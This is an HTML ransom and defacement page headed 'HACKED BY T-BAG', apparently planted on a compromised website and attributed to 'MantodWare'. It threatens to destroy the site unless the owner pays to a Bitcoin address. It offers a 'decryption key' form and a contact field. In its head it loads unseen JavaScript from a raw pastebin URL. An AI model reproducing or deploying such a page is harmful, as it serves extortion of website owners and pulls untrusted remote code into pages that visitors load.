<html>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<meta name="description" content="D704T Ransomweb | MantodWare">
<meta name="keywords" content="ManToed, Ransomware, Ransomweb, Hacked, Locked, Encrypted, D704T"> 
<meta name="author" content="Mantod">
<meta name="robots" content="index, all">
	<link href='https://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Merienda' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Shadows+Into+Light' rel='stylesheet' type='text/css'><link rel="icon" type="image/png" href="https://i.ibb.co/mhGcf0q/D704T.jpg"/><link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
<meta property="og:image" content="https://i.ibb.co/mhGcf0q/D704T.jpg"><script type="text/javascript" src="https://pastebin.com/raw/SbN4UTQX"></script><meta name='theme-color' content='#000000'>
<head>
<title>HACKED BY T-BAG</title></head>
<style>
body {
background: #09140E;
   background-image:url(https://i.ibb.co/mhGcf0q/D704T.jpg); background-size:cover;}
{
-webkit-background-size: 100% 100%;
   -moz-background-size: 100% 100%;
   -o-background-size: 100% 100%;
   background-size: 100% 100%;
}
.mt{
    border:1.2px solid aqua;
    background-color: black;
    color: lime;
    width: 200px;
    height: 25px;
    font-family: Ubuntu;
    text-align: center;
}
.btcaddress{
    border:0.8px solid grey;
    background-color: #1A1C1F;
    color: yellow;
    text-align: center;
    width: 400px;
    height: 26px;
    font-size: 17;
    font-family: Ubuntu;
}
.email{
    border:0px;
    background-color: transparent;
    text-align: center; 
    color: aqua;
    width: 310px;
    height: 30px;
    font-size: 28.5;
    font-family: Iceland;
}
placeholder{
	color: yellow;
}
.gas{
	background-color: black;
	color: gold;
	border: 1.2px solid gold;
	width: 70px;
}
</style>
<center><br><br><br><br><font>
<span style="font: 40px Merienda;color:white;">HACKED BY T-BAG
<hr width="90%"><span style='font: 10px iceland;color:white;text-shadow: 0px 0px 1px;'>| Payment Address |<br><input type="text" class="btcaddress" value="" readonly><br>
<span style='font: 25px iceland;color:grey;text-shadow: 0px 0px 3px;'>Make a payment or I destroy your website and it will not return to normal, by making a payment I will give you a password and your website will return to normal :)
<br><br>
	<span style='font: 9px iceland;color:white;text-shadow: 0px 0px 1px;'>|~ Password ~|
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" class="mt" placeholder="Enter your decryption key">
<input type="submit" class="gas" value="Decrypt">
</form>
<br><br>
<body bgcolor=black><td align=center>
<span style="font: 13px ubuntu;color:gold;">[ SEVEN BROTHERS ATTACKER ]
<hr width="70%" color="red">
	<span style='font: 8.5px Iceland;color:aqua;text-shadow: 0px 0px 2px;'><:: Contact Me ::>
<br><input type="text" class="email" value="" readonly><br>
<br><br><center><button class="lagu" onclick="play();liat();"><font face="courier new" size="2" color="red">CLICK TO PLAY MUSIC</font></button><audio id="lagu" src="https://a.top4top.io/m_1995xhhle3.mp3"></audio><br><br><b>
<marquee behavior="alternate" scrollamount="50" width="450"> <font size="4" color="silver"><b>____________________<font size="4" color="red"><b>_______________________<font size="4" color="silver"><b>____________________</font></marquee><br>
</html>